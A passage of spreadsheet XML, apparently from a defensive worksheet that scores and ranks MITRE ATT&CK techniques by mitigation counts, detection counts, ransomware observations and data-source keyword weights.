        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT41" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU4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2" spans="1:47" ht="63.95">
      <c r="A42" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.3898275719999993E-2</v>
      </c>
      <c r="B42" s="25">
        <f>SUM(H42,M42,V42)*(1+SUM(AE42,AG42,AI42,AK42,AM42))</f>
        <v>0.60564942386666665</v>
      </c>
      <c r="C42" s="25" t="s">
        <v>248</v>
      </c>
      <c r="D42" s="25" t="s">
        <v>249</v>
      </c>
      <c r="E42" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F42" s="51">
        <v>1</v>
      </c>
      <c r="G42" s="51">
        <v>1</v>
      </c>
      <c r="H42" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I42">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J42">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K42">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L42">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M42" s="44">
        <v>8.8708839999999997E-2</v>
      </c>
      <c r="N42" s="51">
        <v>0</v>
      </c>
      <c r="O42" s="51">
        <v>7</v>
      </c>
      <c r="P42" s="51">
        <v>1</v>
      </c>
      <c r="Q42" s="51">
        <v>12</v>
      </c>
      <c r="R42" s="52" t="s">
        <v>250</v>
      </c>
      <c r="S42" s="51">
        <v>9</v>
      </c>
      <c r="T42" s="52" t="s">
        <v>251</v>
      </c>
      <c r="U42" s="51">
        <v>9</v>
      </c>
      <c r="V42" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.26666666666666666</v>
      </c>
      <c r="W42">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>18</v>
      </c>
      <c r="X42">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.32727272727272727</v>
      </c>
      <c r="Y42">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.32727272727272727</v>
      </c>
      <c r="Z42">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>20</v>
      </c>
      <c r="AA42">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.2</v>
      </c>
      <c r="AB42">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.2</v>
      </c>
      <c r="AC42" s="29" t="s">
        <v>252</v>
      </c>
      <c r="AD42" s="25" t="str" cm="1">
        <f t="array" ref="AD42">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC42)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE42" s="25">
        <f>IF(AD42="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF42" s="25" t="str" cm="1">
        <f t="array" ref="AF42">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC42)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG42" s="25">
        <f>IF(AF42="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH42" s="25" t="str" cm="1">
        <f t="array" ref="AH42">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC42)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI42" s="25">
        <f>IF(AH42="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ42" s="25" t="str" cm="1">
        <f t="array" ref="AJ42">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC42)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK42" s="25">
        <f>IF(AJ42="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL42" s="25" t="str" cm="1">
        <f t="array" ref="AL42">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC42)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM42" s="25">
        <f>IF(AL42="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN42" s="60">
        <v>1</v>
      </c>
      <c r="AO42" s="51">
        <v>1</v>
      </c>
      <c r="AP42" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.3898275719999993E-2</v>
      </c>
      <c r="AQ42" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.20188314128888887</v>
      </c>
      <c r="AR42" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.20188314128888887</v>
      </c>
      <c r="AS42" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT42" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU4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3" spans="1:47" ht="32.1">
      <c r="A43" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.2825952519999992E-2</v>
      </c>
      <c r="B43" s="25">
        <f>SUM(H43,M43,V43)*(1+SUM(AE43,AG43,AI43,AK43,AM43))</f>
        <v>0.62825952519999995</v>
      </c>
      <c r="C43" s="25" t="s">
        <v>253</v>
      </c>
      <c r="D43" s="25" t="s">
        <v>254</v>
      </c>
      <c r="E43" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F43" s="51">
        <v>1</v>
      </c>
      <c r="G43" s="51">
        <v>4</v>
      </c>
      <c r="H43" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.25</v>
      </c>
      <c r="I43">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J43">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K43">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.4</v>
      </c>
      <c r="L43">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="M43" s="44">
        <v>7.9518439999999996E-2</v>
      </c>
      <c r="N43" s="51">
        <v>0</v>
      </c>
      <c r="O43" s="51">
        <v>2</v>
      </c>
      <c r="P43" s="51">
        <v>0</v>
      </c>
      <c r="Q43" s="51">
        <v>0</v>
      </c>
      <c r="R43" s="52" t="s">
        <v>255</v>
      </c>
      <c r="S43" s="51">
        <v>6</v>
      </c>
      <c r="T43" s="52" t="s">
        <v>157</v>
      </c>
      <c r="U43" s="51">
        <v>8</v>
      </c>
      <c r="V43" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="W43">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>14</v>
      </c>
      <c r="X43">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Y43">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Z43">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA43">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB43">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC43" s="29" t="s">
        <v>256</v>
      </c>
      <c r="AD43" s="25" t="str" cm="1">
        <f t="array" ref="AD43">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC43)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE43" s="25">
        <f>IF(AD43="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF43" s="25" t="str" cm="1">
        <f t="array" ref="AF43">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC43)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG43" s="25">
        <f>IF(AF43="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH43" s="25" t="str" cm="1">
        <f t="array" ref="AH43">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC43)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI43" s="25">
        <f>IF(AH43="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ43" s="25" t="str" cm="1">
        <f t="array" ref="AJ43">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC43)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK43" s="25">
        <f>IF(AJ43="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL43" s="25" t="str" cm="1">
        <f t="array" ref="AL43">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC43)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM43" s="25">
        <f>IF(AL43="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN43" s="60">
        <v>0</v>
      </c>
      <c r="AO43" s="51">
        <v>0</v>
      </c>
      <c r="AP43" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.2825952519999992E-2</v>
      </c>
      <c r="AQ43" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.20941984173333331</v>
      </c>
      <c r="AR43" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.20941984173333331</v>
      </c>
      <c r="AS43" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT43" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU4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4" spans="1:47" ht="32.1">
      <c r="A44" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.10739170731352381</v>
      </c>
      <c r="B44" s="25">
        <f>SUM(H44,M44,V44)*(1+SUM(AE44,AG44,AI44,AK44,AM44))</f>
        <v>0.40725040646857141</v>
      </c>
      <c r="C44" s="25" t="s">
        <v>257</v>
      </c>
      <c r="D44" s="25" t="s">
        <v>258</v>
      </c>
      <c r="E44" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F44" s="51">
        <v>3</v>
      </c>
      <c r="G44" s="51">
        <v>2</v>
      </c>
      <c r="H44" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.25</v>
      </c>
      <c r="I44">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.3</v>
      </c>
      <c r="J44">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="K44">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L44">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M44" s="44">
        <v>6.1370479999999998E-2</v>
      </c>
      <c r="N44" s="51">
        <v>0</v>
      </c>
      <c r="O44" s="51">
        <v>5</v>
      </c>
      <c r="P44" s="51">
        <v>0</v>
      </c>
      <c r="Q44" s="51">
        <v>1</v>
      </c>
      <c r="R44" s="51"/>
      <c r="S44" s="51">
        <v>0</v>
      </c>
      <c r="T44" s="51"/>
      <c r="U44" s="51">
        <v>0</v>
      </c>
      <c r="V44" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>2.8571428571428567E-2</v>
      </c>
      <c r="W44">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X44">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y44">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z44">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>6</v>
      </c>
      <c r="AA44">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.06</v>
      </c>
      <c r="AB44">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.06</v>
      </c>
      <c r="AC44" s="29" t="s">
        <v>206</v>
      </c>
      <c r="AD44" s="25" t="str" cm="1">
        <f t="array" ref="AD44">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC44)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE44" s="25">
        <f>IF(AD44="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF44" s="25" t="str" cm="1">
        <f t="array" ref="AF44">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC44)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG44" s="25">
        <f>IF(AF44="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH44" s="25" t="str" cm="1">
        <f t="array" ref="AH44">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC44)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI44" s="25">
        <f>IF(AH44="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ44" s="25" t="str" cm="1">
        <f t="array" ref="AJ44">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC44)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK44" s="25">
        <f>IF(AJ44="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL44" s="25" t="str" cm="1">
        <f t="array" ref="AL44">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC44)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM44" s="25">
        <f>IF(AL44="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN44" s="52">
        <v>2</v>
      </c>
      <c r="AO44" s="51">
        <v>1</v>
      </c>
      <c r="AP44" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.10739170731352381</v>
      </c>
      <c r="AQ44" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1357501354895238</v>
      </c>
      <c r="AR44" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1357501354895238</v>
      </c>
      <c r="AS44" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT44" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU4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5" spans="1:47" ht="48">
      <c r="A45" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.30179883095238097</v>
      </c>
      <c r="B45" s="25">
        <f>SUM(H45,M45,V45)*(1+SUM(AE45,AG45,AI45,AK45,AM45))</f>
        <v>0.3513216428571429</v>
      </c>
      <c r="C45" s="25" t="s">
        <v>259</v>
      </c>
      <c r="D45" s="25" t="s">
        <v>260</v>
      </c>
      <c r="E45" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F45" s="51">
        <v>2</v>
      </c>
      <c r="G45" s="51">
        <v>3</v>
      </c>
      <c r="H45" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.25</v>
      </c>
      <c r="I45">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J45">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K45">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.3</v>
      </c>
      <c r="L45">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="M45" s="44">
        <v>5.8464500000000003E-2</v>
      </c>
      <c r="N45" s="51">
        <v>0</v>
      </c>
      <c r="O45" s="51">
        <v>7</v>
      </c>
      <c r="P45" s="51">
        <v>1</v>
      </c>
      <c r="Q45" s="51">
        <v>1</v>
      </c>
      <c r="R45" s="51"/>
      <c r="S45" s="51">
        <v>0</v>
      </c>
      <c r="T45" s="51"/>
      <c r="U45" s="51">
        <v>0</v>
      </c>
      <c r="V45" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>4.2857142857142851E-2</v>
      </c>
      <c r="W45">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X45">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y45">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z45">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>9</v>
      </c>
      <c r="AA45">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.09</v>
      </c>
      <c r="AB45">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.09</v>
      </c>
      <c r="AC45" s="29" t="s">
        <v>141</v>
      </c>
      <c r="AD45" s="25" t="str" cm="1">
        <f t="array" ref="AD45">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC45)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE45" s="25">
        <f>IF(AD45="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF45" s="25" t="str" cm="1">
        <f t="array" ref="AF45">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC45)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG45" s="25">
        <f>IF(AF45="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH45" s="25" t="str" cm="1">
        <f t="array" ref="AH45">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC45)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI45" s="25">
        <f>IF(AH45="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ45" s="25" t="str" cm="1">
        <f t="array" ref="AJ45">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC45)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK45" s="25">
        <f>IF(AJ45="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL45" s="25" t="str" cm="1">
        <f t="array" ref="AL45">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC45)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM45" s="25">
        <f>IF(AL45="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN45" s="60">
        <v>8</v>
      </c>
      <c r="AO45" s="51">
        <v>1</v>
      </c>
      <c r="AP45" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.30179883095238097</v>
      </c>
      <c r="AQ45" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1171072142857143</v>
      </c>
      <c r="AR45" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1171072142857143</v>
      </c>
      <c r="AS45" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.38095238095238093</v>
      </c>
      <c r="AT45" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.38095238095238093</v>
      </c>
      <c r="AU4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6" spans="1:47" ht="32.1">
      <c r="A46" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.52327508809523815</v>
      </c>
      <c r="B46" s="25">
        <f>SUM(H46,M46,V46)*(1+SUM(AE46,AG46,AI46,AK46,AM46))</f>
        <v>0.56608421428571432</v>
      </c>
      <c r="C46" s="25" t="s">
        <v>261</v>
      </c>
      <c r="D46" s="25" t="s">
        <v>262</v>
      </c>
      <c r="E46" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F46" s="51">
        <v>2</v>
      </c>
      <c r="G46" s="51">
        <v>2</v>
      </c>
      <c r="H46" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.2</v>
      </c>
      <c r="I46">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J46">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K46">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L46">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M46" s="44">
